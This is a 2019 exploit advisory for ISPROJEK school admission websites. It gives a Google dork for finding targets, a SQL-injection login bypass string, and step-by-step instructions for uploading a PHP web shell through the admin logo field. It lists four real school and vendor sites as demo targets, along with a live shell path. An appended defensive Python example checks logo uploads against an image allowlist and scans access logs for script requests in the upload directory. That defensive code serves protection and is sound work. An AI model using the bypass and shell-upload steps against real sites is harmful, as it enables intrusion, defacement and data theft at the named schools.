ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability

2019.03.14
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Author: Negat1ve
[+]Team: -1
[+]Google Dork: intext:"ISPROJEK"
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Find a website with the dork. The login URL will be site.sch.id/path/login.php
Log in with these details:
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
You can upload your file via:
1. Click Setting, or paste the link /index.php?p=f_editadmin
2. Click "Edit" on the admin user, or paste the link /index.php?p=f_editadmin&mod=edit&id=1
3. Fill in the whole form, then upload your shell (php extension) in the "File Logo" field
Your file will go to site.sch.id/path/images/logo/yourshell.php
example: https://aplikasi-cbt.com/ppdb/images/logo/captcha.php
NB:
- the file type accepted by this uploader is php
- Risk: Execute, Database Leak, Index Defacement, Drop/Add/Edit Data
Demo sites:
https://aplikasi-cbt.com/ppdb/login.php
https://ma-arrosyidiyah.sch.id/ppdb/login.php
https://mtsyppsbandung.com/ppdb/login.php
https://masirnamiskin.com/ppdb/login.php
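Added defender-side example, not part of the advisory or the ISPROJEK code: a server-side allowlist check for the "File Logo" upload (one extension, image type only, matching magic bytes) and a scan of access-log lines for requests to script files under the logo directory the advisory names as the upload destination. The log lines, IPs, timestamps and file names are constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Constructed Apache combined-format access-log lines (IPs, names and times are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Mar/2019:10:01:02 +0700] "GET /ppdb/login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Mar/2019:10:01:09 +0700] "POST /ppdb/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Mar/2019:10:03:41 +0700] "POST /ppdb/index.php?p=f_editadmin&mod=edit&id=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Mar/2019:10:03:50 +0700] "GET /ppdb/images/logo/captcha.php HTTP/1.1" 200 87 "-" "curl/7.64.0"
198.51.100.9 - - [14/Mar/2019:10:05:00 +0700] "GET /ppdb/images/logo/school.png HTTP/1.1" 200 14822 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Mar/2019:10:05:30 +0700] "GET /ppdb/images/logo/x.php.png HTTP/1.1" 200 91 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_DIR = "/ppdb/images/logo/"  # where the advisory says "File Logo" uploads land
SCRIPT_SUFFIXES = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Image allowlist for the logo field: extension -> magic bytes the file must start with.
LOGO_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
              ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}


def accept_logo_upload(filename: str, content: bytes) -> bool:
    """Server-side check for the logo upload: exactly one extension, that extension is an
    image type on the allowlist, and the file header matches the claimed type."""
    suffixes = PurePosixPath(filename).suffixes
    if len(suffixes) != 1:  # rejects "shell.php.png" style double extensions
        return False
    magic = LOGO_MAGIC.get(suffixes[0].lower())
    return magic is not None and content.startswith(magic)


def script_hits_in_upload_dir(lines):
    """Return (ip, path, status) for each request that fetches a script-like file from the
    upload directory; any such hit means a non-image file was stored there."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]
        # Check every suffix, so "x.php.png" is flagged as well as "x.php".
        suffixes = {s.lower() for s in PurePosixPath(path).suffixes}
        if path.startswith(UPLOAD_DIR) and suffixes & SCRIPT_SUFFIXES:
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in script_hits_in_upload_dir(SAMPLE_LOG.splitlines()):
        print("suspicious upload-dir request:", hit)
```

The same allowlist logic belongs in the login handler's sibling fix: the credential query must be parameterized, since the `' or 1=1` payload above only works when user input is concatenated into the SQL string.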


Copyright 2019, cxsecurity.com